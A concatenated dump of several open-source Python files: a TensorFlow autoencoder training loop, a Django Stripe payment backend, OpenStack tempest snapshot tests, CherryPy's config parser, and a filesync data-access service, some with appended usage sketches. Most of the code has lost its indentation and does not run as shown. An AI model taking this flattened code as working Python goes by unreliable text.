train_y = y[0:num_samples - valid_set_len, :]
_pretrain_criterion = MonitorBased(n_steps=pretrain_iter_num,
monitor_fn=self.get_encode_loss,
monitor_fn_args=(current_layer, valid_x, valid_y),
save_fn=tf.train.Saver().save,
save_fn_args=(session, layer_summaries_dir + '/best.ckpt'))
else:
logger.error('Wrong criterion %s specified.' % pretrain_criterion)
return
injector = BatchInjector(data_x=train_x, data_y=train_y, batch_size=batch_size)
i = 0
while _pretrain_criterion.continue_learning():
batch_x, batch_y = injector.next_batch()
if summaries_dir is not None and (i % summary_interval == 0):
summary, loss = session.run(
[current_layer.merged, current_layer.encode_loss],
feed_dict={self.x: x, self.y_: y}
)
train_writer.add_summary(summary, i)
logger.info('Pre-training Layer %d, Step %d, training loss %g' % (j, i, loss))
if test_x is not None and test_y is not None:
summary, loss = session.run(
[current_layer.merged, current_layer.encode_loss],
feed_dict={self.x: test_x, self.y_: test_y}
)
test_writer.add_summary(summary, i)
logger.info('Pre-training Layer %d, Step %d, test loss %g' % (j, i, loss))
if pretrain_criterion == 'monitor_based':
summary, loss = session.run(
[current_layer.merged, current_layer.encode_loss],
feed_dict={self.x: valid_x, self.y_: valid_y}
)
valid_writer.add_summary(summary, i)
logger.info('Pre-training Layer %d, Step %d, valid loss %g' % (j, i, loss))
_ = session.run(self.encode_opts[j], feed_dict={self.x: batch_x, self.y_: batch_y})
i += 1
if pretrain_criterion == 'monitor_based':
tf.train.Saver().restore(session, layer_summaries_dir + '/best.ckpt')
if summaries_dir is not None:
train_writer.close()
test_writer.close()
valid_writer.close()
# Finish all internal layer-by-layer pre-training
# Start fine tuning
if summaries_dir is not None:
tuning_summaries_dir = '%s/fine_tuning' % summaries_dir
train_writer = tf.summary.FileWriter(tuning_summaries_dir + '/train')
test_writer = tf.summary.FileWriter(tuning_summaries_dir + '/test')
valid_writer = tf.summary.FileWriter(tuning_summaries_dir + '/valid')
# Setup Stopping Criterion
if tuning_criterion == 'const_iterations':
            _tuning_criterion = ConstIterations(num_iters=tuning_iter_num)
train_x = x
train_y = y
elif tuning_criterion == 'monitor_based':
num_samples = x.shape[0]
valid_set_len = int(1 / 5 * num_samples)
valid_x = x[num_samples - valid_set_len:num_samples, :]
valid_y = y[num_samples - valid_set_len:num_samples, :]
train_x = x[0:num_samples - valid_set_len, :]
train_y = y[0:num_samples - valid_set_len, :]
            _tuning_criterion = MonitorBased(n_steps=tuning_iter_num,
monitor_fn=self.predict_accuracy,
monitor_fn_args=(valid_x, valid_y),
save_fn=tf.train.Saver().save,
save_fn_args=(session, tuning_summaries_dir + '/best.ckpt'))
else:
            logger.error('Wrong criterion %s specified.' % tuning_criterion)
return
injector = BatchInjector(data_x=train_x, data_y=train_y, batch_size=batch_size)
i = 0
while _tuning_criterion.continue_learning():
batch_x, batch_y = injector.next_batch()
if summaries_dir is not None and (i % summary_interval == 0):
summary, loss, accuracy = session.run([self.merged, self.loss, self.accuracy],
feed_dict={self.x: train_x, self.y_: train_y})
train_writer.add_summary(summary, i)
logger.info('Fine-Tuning: Step %d, training accuracy %g, loss %g' % (i, accuracy, loss))
if (test_x is not None) and (test_y is not None):
merged, accuracy = session.run([self.merged, self.accuracy],
feed_dict={self.x: test_x, self.y_: test_y})
test_writer.add_summary(merged, i)
logger.info('Fine-Tuning: Step %d, test accuracy %g' % (i, accuracy))
if tuning_criterion == 'monitor_based':
merged, accuracy = session.run([self.merged, self.accuracy],
feed_dict={self.x: valid_x, self.y_: valid_y})
valid_writer.add_summary(merged, i)
logger.info('Fine-Tuning: Step %d, valid accuracy %g' % (i, accuracy))
_ = session.run(self.fine_tuning, feed_dict={self.x: batch_x, self.y_: batch_y})
i += 1
if tuning_criterion == 'monitor_based':
tf.train.Saver().restore(session, tuning_summaries_dir + '/best.ckpt')
if summaries_dir is not None:
train_writer.close()
test_writer.close()
valid_writer.close()
def get_encode_loss(self, layer, x, y, session=None):
"""Get encoder loss of layer specified
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(layer.encode_loss, feed_dict={self.x: x, self.y_: y})
def predict_accuracy(self, x, y, session=None):
"""Get Accuracy given feature array and corresponding labels
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(self.accuracy, feed_dict={self.x: x, self.y_: y})
def predict_proba(self, x, session=None):
"""Predict probability (Softmax)
"""
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(self.y, feed_dict={self.x: x})
def predict(self, x, session=None):
if session is None:
if self.sess is None:
session = tf.Session()
self.sess = session
else:
session = self.sess
return session.run(self.y_class, feed_dict={self.x: x})
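# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of driving the SDA class above, assuming a TensorFlow 1.x
# environment; the synthetic data, layer sizes and iteration counts below are
# arbitrary assumptions chosen only for demonstration.
if __name__ == '__main__':
    demo_x = np.random.rand(200, 30).astype(np.float32)    # 200 samples, 30 features
    demo_labels = np.random.randint(0, 3, size=200)         # 3 classes
    demo_y = np.eye(3)[demo_labels].astype(np.float32)      # one-hot encoded labels
    sda = SDA(num_features=30, num_classes=3, layers=[20, 10])
    # Layer-by-layer pre-training followed by supervised fine-tuning
    sda.fit(demo_x, demo_y, batch_size=50,
            pretrain_iter_num=20, tuning_iter_num=20)
    print(sda.predict(demo_x)[:10])    # predicted class indices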
| bsd-3-clause |
CCrypto/ccvpn3 | payments/backends/stripe.py | 1 | 7750 | import json
from django.utils.translation import ugettext_lazy as _
from django.core.urlresolvers import reverse
from .base import BackendBase
class StripeBackend(BackendBase):
backend_id = 'stripe'
backend_verbose_name = _("Stripe")
backend_display_name = _("Credit Card")
backend_has_recurring = True
def get_plan_id(self, period):
return 'ccvpn_' + period
def __init__(self, settings):
if 'API_KEY' not in settings or 'PUBLIC_KEY' not in settings:
return
import stripe
self.stripe = stripe
stripe.api_key = settings['API_KEY']
self.pubkey = settings['PUBLIC_KEY']
self.header_image = settings.get('HEADER_IMAGE', '')
self.currency = settings.get('CURRENCY', 'EUR')
self.name = settings.get('NAME', 'VPN Payment')
self.backend_enabled = True
def new_payment(self, payment):
desc = str(payment.time) + ' for ' + payment.user.username
form = '''
<form action="{post}" method="POST">
<script
src="https://checkout.stripe.com/checkout.js" class="stripe-button"
data-key="{pubkey}"
data-image="{img}"
data-name="{name}"
data-currency="{curr}"
data-description="{desc}"
data-amount="{amount}"
data-email="{email}"
data-locale="auto"
data-zip-code="true"
data-alipay="true">
</script>
</form>
'''
return form.format(
post=reverse('payments:cb_stripe', args=(payment.id,)),
pubkey=self.pubkey,
img=self.header_image,
email=payment.user.email or '',
name=self.name,
desc=desc,
amount=payment.amount,
curr=self.currency,
)
def new_subscription(self, subscr):
desc = 'Subscription (' + str(subscr.period) + ') for ' + subscr.user.username
form = '''
<form action="{post}" method="POST">
<script
src="https://checkout.stripe.com/checkout.js" class="stripe-button"
data-key="{pubkey}"
data-image="{img}"
data-name="{name}"
data-currency="{curr}"
data-description="{desc}"
data-amount="{amount}"
data-email="{email}"
data-locale="auto"
data-zip-code="true"
data-alipay="true">
</script>
</form>
<noscript><p>Please enable JavaScript to use the payment form.</p></noscript>
'''
return form.format(
post=reverse('payments:cb_stripe_subscr', args=(subscr.id,)),
pubkey=self.pubkey,
img=self.header_image,
email=subscr.user.email or '',
name=self.name,
desc=desc,
amount=subscr.period_amount,
curr=self.currency,
)
def cancel_subscription(self, subscr):
if subscr.status not in ('new', 'unconfirmed', 'active'):
return
try:
cust = self.stripe.Customer.retrieve(subscr.backend_extid)
except self.stripe.error.InvalidRequestError:
return
try:
# Delete customer and cancel any active subscription
cust.delete()
except self.stripe.error.InvalidRequestError:
pass
subscr.status = 'cancelled'
subscr.save()
def callback(self, payment, request):
post_data = request.POST
token = post_data.get('stripeToken')
if not token:
payment.status = 'cancelled'
payment.status_message = _("No payment information was received.")
return
months = int(payment.time.days / 30)
username = payment.user.username
try:
charge = self.stripe.Charge.create(
amount=payment.amount,
currency=self.currency,
card=token,
description="%d months for %s" % (months, username),
)
payment.backend_extid = charge['id']
if charge['refunded'] or not charge['paid']:
payment.status = 'rejected'
payment.status_message = _("The payment has been refunded or rejected.")
payment.save()
return
payment.paid_amount = int(charge['amount'])
if payment.paid_amount < payment.amount:
payment.status = 'error'
payment.status_message = _("The paid amount is under the required amount.")
payment.save()
return
payment.status = 'confirmed'
payment.status_message = None
payment.save()
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
except self.stripe.error.CardError as e:
payment.status = 'rejected'
payment.status_message = e.json_body['error']['message']
payment.save()
def callback_subscr(self, subscr, request):
post_data = request.POST
token = post_data.get('stripeToken')
if not token:
subscr.status = 'cancelled'
subscr.save()
return
try:
cust = self.stripe.Customer.create(
source=token,
plan=self.get_plan_id(subscr.period),
)
except self.stripe.error.InvalidRequestError:
return
except self.stripe.CardError as e:
subscr.status = 'error'
subscr.backend_data['stripe_error'] = e.json_body['error']['message']
return
# We don't know much about the new Payment, but we know it
        # succeeded. Webhooks aren't very reliable, so let's mark it as active
# anyway.
subscr.status = 'active'
subscr.backend_extid = cust['id']
subscr.save()
def webhook_payment_succeeded(self, event):
from payments.models import Subscription, Payment
invoice = event['data']['object']
customer_id = invoice['customer']
# Prevent making duplicate Payments if event is received twice
pc = Payment.objects.filter(backend_extid=invoice['id']).count()
if pc > 0:
return
subscr = Subscription.objects.get(backend_extid=customer_id)
payment = subscr.create_payment()
payment.status = 'confirmed'
payment.paid_amount = invoice['total']
payment.backend_extid = invoice['id']
payment.backend_data = {'event_id': event['id']}
payment.save()
payment.user.vpnuser.add_paid_time(payment.time)
payment.user.vpnuser.on_payment_confirmed(payment)
payment.user.vpnuser.save()
payment.save()
subscr.status = 'active'
subscr.save()
def webhook(self, request):
try:
event_json = json.loads(request.body.decode('utf-8'))
event = self.stripe.Event.retrieve(event_json["id"])
except (ValueError, self.stripe.error.InvalidRequestError):
return False
if event['type'] == 'invoice.payment_succeeded':
self.webhook_payment_succeeded(event)
return True
def get_ext_url(self, payment):
if not payment.backend_extid:
return None
return 'https://dashboard.stripe.com/payments/%s' % payment.backend_extid
def get_subscr_ext_url(self, subscr):
if not subscr.backend_extid:
return None
return 'https://dashboard.stripe.com/customers/%s' % subscr.backend_extid
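# --- Illustrative usage sketch (not part of the original module) ---
# A minimal example of wiring this backend up; the key values below are
# placeholders for Stripe test-mode credentials, not real secrets.
#
# backend = StripeBackend({
#     'API_KEY': 'sk_test_xxx',
#     'PUBLIC_KEY': 'pk_test_xxx',
#     'CURRENCY': 'EUR',
#     'NAME': 'VPN Payment',
# })
# form_html = backend.new_payment(payment)    # checkout.js form for a Payment
# handled = backend.webhook(request)          # False only when the event cannot be parsed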
| mit |
Vaidyanath/tempest | tempest/api/volume/test_volumes_snapshots.py | 1 | 8416 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.volume import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.openstack.common import log as logging
from tempest import test
LOG = logging.getLogger(__name__)
CONF = config.CONF
class VolumesV2SnapshotTestJSON(base.BaseVolumeTest):
@classmethod
def skip_checks(cls):
super(VolumesV2SnapshotTestJSON, cls).skip_checks()
if not CONF.volume_feature_enabled.snapshot:
raise cls.skipException("Cinder volume snapshots are disabled")
@classmethod
def resource_setup(cls):
super(VolumesV2SnapshotTestJSON, cls).resource_setup()
cls.volume_origin = cls.create_volume()
cls.name_field = cls.special_fields['name_field']
cls.descrip_field = cls.special_fields['descrip_field']
def _detach(self, volume_id):
"""Detach volume."""
self.volumes_client.detach_volume(volume_id)
self.volumes_client.wait_for_volume_status(volume_id, 'available')
def _list_by_param_values_and_assert(self, params, with_detail=False):
"""
Perform list or list_details action with given params
        and validate the result.
"""
if with_detail:
fetched_snap_list = \
self.snapshots_client.\
list_snapshots_with_detail(params=params)
else:
fetched_snap_list = \
self.snapshots_client.list_snapshots(params=params)
# Validating params of fetched snapshots
for snap in fetched_snap_list:
for key in params:
msg = "Failed to list snapshots %s by %s" % \
('details' if with_detail else '', key)
self.assertEqual(params[key], snap[key], msg)
@test.attr(type='gate')
@test.services('compute')
def test_snapshot_create_with_volume_in_use(self):
# Create a snapshot when volume status is in-use
# Create a test instance
server_name = data_utils.rand_name('instance-')
server = self.servers_client.create_server(server_name,
self.image_ref,
self.flavor_ref)
self.addCleanup(self.servers_client.delete_server, server['id'])
self.servers_client.wait_for_server_status(server['id'], 'ACTIVE')
mountpoint = '/dev/%s' % CONF.compute.volume_device_name
self.servers_client.attach_volume(
server['id'], self.volume_origin['id'], mountpoint)
self.volumes_client.wait_for_volume_status(self.volume_origin['id'],
'in-use')
self.addCleanup(self.volumes_client.wait_for_volume_status,
self.volume_origin['id'], 'available')
self.addCleanup(self.servers_client.detach_volume, server['id'],
self.volume_origin['id'])
# Snapshot a volume even if it's attached to an instance
snapshot = self.create_snapshot(self.volume_origin['id'],
force=True)
# Delete the snapshot
self.snapshots_client.delete_snapshot(snapshot['id'])
self.snapshots_client.wait_for_resource_deletion(snapshot['id'])
self.snapshots.remove(snapshot)
@test.attr(type='gate')
def test_snapshot_create_get_list_update_delete(self):
# Create a snapshot
s_name = data_utils.rand_name('snap')
params = {self.name_field: s_name}
snapshot = self.create_snapshot(self.volume_origin['id'], **params)
# Get the snap and check for some of its details
snap_get = self.snapshots_client.get_snapshot(snapshot['id'])
self.assertEqual(self.volume_origin['id'],
snap_get['volume_id'],
"Referred volume origin mismatch")
# Compare also with the output from the list action
tracking_data = (snapshot['id'], snapshot[self.name_field])
snaps_list = self.snapshots_client.list_snapshots()
snaps_data = [(f['id'], f[self.name_field]) for f in snaps_list]
self.assertIn(tracking_data, snaps_data)
# Updates snapshot with new values
new_s_name = data_utils.rand_name('new-snap')
new_desc = 'This is the new description of snapshot.'
params = {self.name_field: new_s_name,
self.descrip_field: new_desc}
update_snapshot = \
self.snapshots_client.update_snapshot(snapshot['id'], **params)
# Assert response body for update_snapshot method
self.assertEqual(new_s_name, update_snapshot[self.name_field])
self.assertEqual(new_desc, update_snapshot[self.descrip_field])
# Assert response body for get_snapshot method
updated_snapshot = \
self.snapshots_client.get_snapshot(snapshot['id'])
self.assertEqual(new_s_name, updated_snapshot[self.name_field])
self.assertEqual(new_desc, updated_snapshot[self.descrip_field])
# Delete the snapshot
self.snapshots_client.delete_snapshot(snapshot['id'])
self.snapshots_client.wait_for_resource_deletion(snapshot['id'])
self.snapshots.remove(snapshot)
@test.attr(type='gate')
def test_snapshots_list_with_params(self):
"""list snapshots with params."""
# Create a snapshot
display_name = data_utils.rand_name('snap')
params = {self.name_field: display_name}
snapshot = self.create_snapshot(self.volume_origin['id'], **params)
# Verify list snapshots by display_name filter
params = {self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params)
# Verify list snapshots by status filter
params = {'status': 'available'}
self._list_by_param_values_and_assert(params)
# Verify list snapshots by status and display name filter
params = {'status': 'available',
self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params)
@test.attr(type='gate')
def test_snapshots_list_details_with_params(self):
"""list snapshot details with params."""
# Create a snapshot
display_name = data_utils.rand_name('snap')
params = {self.name_field: display_name}
snapshot = self.create_snapshot(self.volume_origin['id'], **params)
# Verify list snapshot details by display_name filter
params = {self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params, with_detail=True)
# Verify list snapshot details by status filter
params = {'status': 'available'}
self._list_by_param_values_and_assert(params, with_detail=True)
# Verify list snapshot details by status and display name filter
params = {'status': 'available',
self.name_field: snapshot[self.name_field]}
self._list_by_param_values_and_assert(params, with_detail=True)
@test.attr(type='gate')
def test_volume_from_snapshot(self):
# Create a temporary snap using wrapper method from base, then
# create a snap based volume and deletes it
snapshot = self.create_snapshot(self.volume_origin['id'])
# NOTE(gfidente): size is required also when passing snapshot_id
volume = self.volumes_client.create_volume(
size=1,
snapshot_id=snapshot['id'])
self.volumes_client.wait_for_volume_status(volume['id'], 'available')
self.volumes_client.delete_volume(volume['id'])
self.volumes_client.wait_for_resource_deletion(volume['id'])
self.clear_snapshots()
class VolumesV1SnapshotTestJSON(VolumesV2SnapshotTestJSON):
_api_version = 1
| apache-2.0 |
rembo10/headphones | lib/cherrypy/lib/reprconf.py | 53 | 14704 | """Generic configuration system using unrepr.
Configuration data may be supplied as a Python dictionary, as a filename,
or as an open file object. When you supply a filename or file, Python's
builtin ConfigParser is used (with some extensions).
Namespaces
----------
Configuration keys are separated into namespaces by the first "." in the key.
The only key that cannot exist in a namespace is the "environment" entry.
This special entry 'imports' other config entries from a template stored in
the Config.environments dict.
You can define your own namespaces to be called when new config is merged
by adding a named handler to Config.namespaces. The name can be any string,
and the handler must be either a callable or a context manager.
"""
try:
# Python 3.0+
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
try:
set
except NameError:
from sets import Set as set
try:
basestring
except NameError:
basestring = str
try:
# Python 3
import builtins
except ImportError:
# Python 2
import __builtin__ as builtins
import operator as _operator
import sys
def as_dict(config):
"""Return a dict from 'config' whether it is a dict, file, or filename."""
if isinstance(config, basestring):
config = Parser().dict_from_file(config)
elif hasattr(config, 'read'):
config = Parser().dict_from_file(config)
return config
class NamespaceSet(dict):
"""A dict of config namespace names and handlers.
Each config entry should begin with a namespace name; the corresponding
namespace handler will be called once for each config entry in that
namespace, and will be passed two arguments: the config key (with the
namespace removed) and the config value.
Namespace handlers may be any Python callable; they may also be
Python 2.5-style 'context managers', in which case their __enter__
method should return a callable to be used as the handler.
See cherrypy.tools (the Toolbox class) for an example.
"""
def __call__(self, config):
"""Iterate through config and pass it to each namespace handler.
config
A flat dict, where keys use dots to separate
namespaces, and values are arbitrary.
The first name in each config key is used to look up the corresponding
namespace handler. For example, a config entry of {'tools.gzip.on': v}
will call the 'tools' namespace handler with the args: ('gzip.on', v)
"""
# Separate the given config into namespaces
ns_confs = {}
for k in config:
if "." in k:
ns, name = k.split(".", 1)
bucket = ns_confs.setdefault(ns, {})
bucket[name] = config[k]
# I chose __enter__ and __exit__ so someday this could be
# rewritten using Python 2.5's 'with' statement:
# for ns, handler in self.iteritems():
# with handler as callable:
# for k, v in ns_confs.get(ns, {}).iteritems():
# callable(k, v)
for ns, handler in self.items():
exit = getattr(handler, "__exit__", None)
if exit:
callable = handler.__enter__()
no_exc = True
try:
try:
for k, v in ns_confs.get(ns, {}).items():
callable(k, v)
except:
# The exceptional case is handled here
no_exc = False
if exit is None:
raise
if not exit(*sys.exc_info()):
raise
# The exception is swallowed if exit() returns true
finally:
# The normal and non-local-goto cases are handled here
if no_exc and exit:
exit(None, None, None)
else:
for k, v in ns_confs.get(ns, {}).items():
handler(k, v)
def __repr__(self):
return "%s.%s(%s)" % (self.__module__, self.__class__.__name__,
dict.__repr__(self))
def __copy__(self):
newobj = self.__class__()
newobj.update(self)
return newobj
copy = __copy__
class Config(dict):
"""A dict-like set of configuration data, with defaults and namespaces.
May take a file, filename, or dict.
"""
defaults = {}
environments = {}
namespaces = NamespaceSet()
def __init__(self, file=None, **kwargs):
self.reset()
if file is not None:
self.update(file)
if kwargs:
self.update(kwargs)
def reset(self):
"""Reset self to default values."""
self.clear()
dict.update(self, self.defaults)
def update(self, config):
"""Update self from a dict, file or filename."""
if isinstance(config, basestring):
# Filename
config = Parser().dict_from_file(config)
elif hasattr(config, 'read'):
# Open file object
config = Parser().dict_from_file(config)
else:
config = config.copy()
self._apply(config)
def _apply(self, config):
"""Update self from a dict."""
which_env = config.get('environment')
if which_env:
env = self.environments[which_env]
for k in env:
if k not in config:
config[k] = env[k]
dict.update(self, config)
self.namespaces(config)
def __setitem__(self, k, v):
dict.__setitem__(self, k, v)
self.namespaces({k: v})
class Parser(ConfigParser):
"""Sub-class of ConfigParser that keeps the case of options and that
raises an exception if the file cannot be read.
"""
def optionxform(self, optionstr):
return optionstr
def read(self, filenames):
if isinstance(filenames, basestring):
filenames = [filenames]
for filename in filenames:
# try:
# fp = open(filename)
# except IOError:
# continue
fp = open(filename)
try:
self._read(fp, filename)
finally:
fp.close()
def as_dict(self, raw=False, vars=None):
"""Convert an INI file to a dictionary"""
# Load INI file into a dict
result = {}
for section in self.sections():
if section not in result:
result[section] = {}
for option in self.options(section):
value = self.get(section, option, raw=raw, vars=vars)
try:
value = unrepr(value)
except Exception:
x = sys.exc_info()[1]
msg = ("Config error in section: %r, option: %r, "
"value: %r. Config values must be valid Python." %
(section, option, value))
raise ValueError(msg, x.__class__.__name__, x.args)
result[section][option] = value
return result
def dict_from_file(self, file):
if hasattr(file, 'read'):
self.readfp(file)
else:
self.read(file)
return self.as_dict()
# public domain "unrepr" implementation, found on the web and then improved.
class _Builder2:
def build(self, o):
m = getattr(self, 'build_' + o.__class__.__name__, None)
if m is None:
raise TypeError("unrepr does not recognize %s" %
repr(o.__class__.__name__))
return m(o)
def astnode(self, s):
"""Return a Python2 ast Node compiled from a string."""
try:
import compiler
except ImportError:
# Fallback to eval when compiler package is not available,
# e.g. IronPython 1.0.
return eval(s)
p = compiler.parse("__tempvalue__ = " + s)
return p.getChildren()[1].getChildren()[0].getChildren()[1]
def build_Subscript(self, o):
expr, flags, subs = o.getChildren()
expr = self.build(expr)
subs = self.build(subs)
return expr[subs]
def build_CallFunc(self, o):
children = o.getChildren()
# Build callee from first child
callee = self.build(children[0])
# Build args and kwargs from remaining children
args = []
kwargs = {}
for child in children[1:]:
class_name = child.__class__.__name__
# None is ignored
if class_name == 'NoneType':
continue
# Keywords become kwargs
if class_name == 'Keyword':
kwargs.update(self.build(child))
# Everything else becomes args
            else:
args.append(self.build(child))
return callee(*args, **kwargs)
def build_Keyword(self, o):
key, value_obj = o.getChildren()
value = self.build(value_obj)
kw_dict = {key: value}
return kw_dict
def build_List(self, o):
return map(self.build, o.getChildren())
def build_Const(self, o):
return o.value
def build_Dict(self, o):
d = {}
i = iter(map(self.build, o.getChildren()))
for el in i:
d[el] = i.next()
return d
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
name = o.name
if name == 'None':
return None
if name == 'True':
return True
if name == 'False':
return False
# See if the Name is a package or module. If it is, import it.
try:
return modules(name)
except ImportError:
pass
# See if the Name is in builtins.
try:
return getattr(builtins, name)
except AttributeError:
pass
raise TypeError("unrepr could not resolve the name %s" % repr(name))
def build_Add(self, o):
left, right = map(self.build, o.getChildren())
return left + right
def build_Mul(self, o):
left, right = map(self.build, o.getChildren())
return left * right
def build_Getattr(self, o):
parent = self.build(o.expr)
return getattr(parent, o.attrname)
def build_NoneType(self, o):
return None
def build_UnarySub(self, o):
return -self.build(o.getChildren()[0])
def build_UnaryAdd(self, o):
return self.build(o.getChildren()[0])
class _Builder3:
def build(self, o):
m = getattr(self, 'build_' + o.__class__.__name__, None)
if m is None:
raise TypeError("unrepr does not recognize %s" %
repr(o.__class__.__name__))
return m(o)
def astnode(self, s):
"""Return a Python3 ast Node compiled from a string."""
try:
import ast
except ImportError:
# Fallback to eval when ast package is not available,
# e.g. IronPython 1.0.
return eval(s)
p = ast.parse("__tempvalue__ = " + s)
return p.body[0].value
def build_Subscript(self, o):
return self.build(o.value)[self.build(o.slice)]
def build_Index(self, o):
return self.build(o.value)
def build_Call(self, o):
callee = self.build(o.func)
if o.args is None:
args = ()
else:
args = tuple([self.build(a) for a in o.args])
if o.starargs is None:
starargs = ()
else:
starargs = self.build(o.starargs)
if o.kwargs is None:
kwargs = {}
else:
kwargs = self.build(o.kwargs)
return callee(*(args + starargs), **kwargs)
def build_List(self, o):
return list(map(self.build, o.elts))
def build_Str(self, o):
return o.s
def build_Num(self, o):
return o.n
def build_Dict(self, o):
return dict([(self.build(k), self.build(v))
for k, v in zip(o.keys, o.values)])
def build_Tuple(self, o):
return tuple(self.build_List(o))
def build_Name(self, o):
name = o.id
if name == 'None':
return None
if name == 'True':
return True
if name == 'False':
return False
# See if the Name is a package or module. If it is, import it.
try:
return modules(name)
except ImportError:
pass
# See if the Name is in builtins.
try:
import builtins
return getattr(builtins, name)
except AttributeError:
pass
raise TypeError("unrepr could not resolve the name %s" % repr(name))
def build_NameConstant(self, o):
return o.value
def build_UnaryOp(self, o):
op, operand = map(self.build, [o.op, o.operand])
return op(operand)
def build_BinOp(self, o):
left, op, right = map(self.build, [o.left, o.op, o.right])
return op(left, right)
def build_Add(self, o):
return _operator.add
def build_Mult(self, o):
return _operator.mul
def build_USub(self, o):
return _operator.neg
def build_Attribute(self, o):
parent = self.build(o.value)
return getattr(parent, o.attr)
def build_NoneType(self, o):
return None
def unrepr(s):
"""Return a Python object compiled from a string."""
if not s:
return s
if sys.version_info < (3, 0):
b = _Builder2()
else:
b = _Builder3()
obj = b.astnode(s)
return b.build(obj)
def modules(modulePath):
"""Load a module and retrieve a reference to that module."""
__import__(modulePath)
return sys.modules[modulePath]
def attributes(full_attribute_name):
"""Load a module and retrieve an attribute of that module."""
# Parse out the path, module, and attribute
last_dot = full_attribute_name.rfind(".")
attr_name = full_attribute_name[last_dot + 1:]
mod_path = full_attribute_name[:last_dot]
mod = modules(mod_path)
# Let an AttributeError propagate outward.
try:
attr = getattr(mod, attr_name)
except AttributeError:
raise AttributeError("'%s' object has no attribute '%s'"
% (mod_path, attr_name))
# Return a reference to the attribute.
return attr
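# --- Illustrative usage sketch (not part of the original module) ---
# A minimal demonstration of the Config/namespace machinery above; the sample
# keys are arbitrary. With no handlers registered in Config.namespaces, the
# namespaced keys are simply stored; a handler registered under 'server' would
# be called with ('socket_port', 8080).
if __name__ == '__main__':
    cfg = Config()
    cfg.update({'server.socket_port': 8080, 'log.screen': True})
    print(cfg['server.socket_port'])
    # unrepr("{'a': 1}") would rebuild the dict from its string form on the
    # Python versions this vintage module supports.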
| gpl-3.0 |
indradhanush/filesync-server | src/rpcdb/dal_backend.py | 6 | 16812 | # Copyright 2008-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# For further info, check http://launchpad.net/filesync-server
"""The DAL entry point as a service."""
import uuid
from backends.filesync.data import services, errors, model
class DAL(object):
"""The entry point for the DAL."""
def _get_user(self, user_id, session_id=None):
"""Return a storage user for the given id."""
return services.get_storage_user(user_id, session_id=session_id)
def ping(self):
"""Used for a simple liveness check."""
return dict(response="pong")
def unlink_node(self, user_id, volume_id, node_id, session_id=None):
"""Unlink a node."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).node(node_id).delete()
return dict(generation=node.generation, kind=node.kind,
name=node.name, mimetype=node.mimetype)
def list_volumes(self, user_id):
"""List all the volumes the user is involved.
This includes the real Root, the UDFs, and the shares that were shared
to the user already accepted.
"""
user = self._get_user(user_id)
# root info
root = user.volume().get_volume()
root_info = dict(root_id=root.root_id, generation=root.generation)
# quota
free_bytes = user.get_quota().free_bytes
# shares
shares = []
for share in user.get_shared_to(accepted=True):
suser = share.shared_by
resp = dict(id=share.id, root_id=share.root_id, name=share.name,
shared_by_username=suser.username,
shared_by_visible_name=suser.visible_name,
accepted=share.accepted, access=share.access)
info = services.get_user_info_for_shard(suser.id, suser.shard_id)
resp['free_bytes'] = info.free_bytes
resp['generation'] = share.get_generation()
shares.append(resp)
# udfs
udfs = []
for udf in user.get_udfs():
resp = dict(id=udf.id, root_id=udf.root_id, path=udf.path,
generation=udf.generation)
udfs.append(resp)
result = dict(root=root_info, free_bytes=free_bytes,
shares=shares, udfs=udfs)
return result
def move(self, user_id, volume_id, node_id,
new_parent_id, new_name, session_id=None):
"""Move a node and/or rename it."""
user = self._get_user(user_id, session_id)
# If we get new_parent_id as str/unicode, generate a UUID using it
# because StorageObject.move() expects it to be either a UUID or None.
if isinstance(new_parent_id, basestring):
new_parent_id = uuid.UUID(new_parent_id)
node = user.volume(volume_id).node(node_id).move(new_parent_id,
new_name)
return dict(generation=node.generation, mimetype=node.mimetype)
def make_dir(self, user_id, volume_id, parent_id, name, session_id=None):
"""Make a subdirectory."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).dir(parent_id).make_subdirectory(name)
return dict(generation=node.generation, node_id=node.id,
mimetype=node.mimetype)
def make_file(self, user_id, volume_id, parent_id, name, session_id=None):
"""Make a no-content file."""
user = self._get_user(user_id, session_id)
node = user.volume(volume_id).dir(parent_id).make_file(name)
return dict(generation=node.generation, node_id=node.id,
mimetype=node.mimetype)
def make_file_with_content(self, user_id, volume_id, parent_id, name,
node_hash, crc32, size, deflated_size,
storage_key, session_id=None):
"""Make a file with associated content."""
user = self._get_user(user_id, session_id)
func = user.volume(volume_id).dir(parent_id).make_file_with_content
node = func(name, node_hash, crc32, size, deflated_size, storage_key)
return dict(generation=node.generation, node_id=node.id)
def create_share(self, user_id, node_id,
to_username, share_name, readonly):
"""Create a share."""
user = self._get_user(user_id)
to_user = services.get_storage_user(username=to_username)
share = user.volume().dir(node_id).share(to_user.id,
share_name, readonly)
return dict(share_id=share.id)
def delete_share(self, user_id, share_id):
"""Delete a share."""
user = self._get_user(user_id)
share = user.get_share(share_id)
share.delete()
return {}
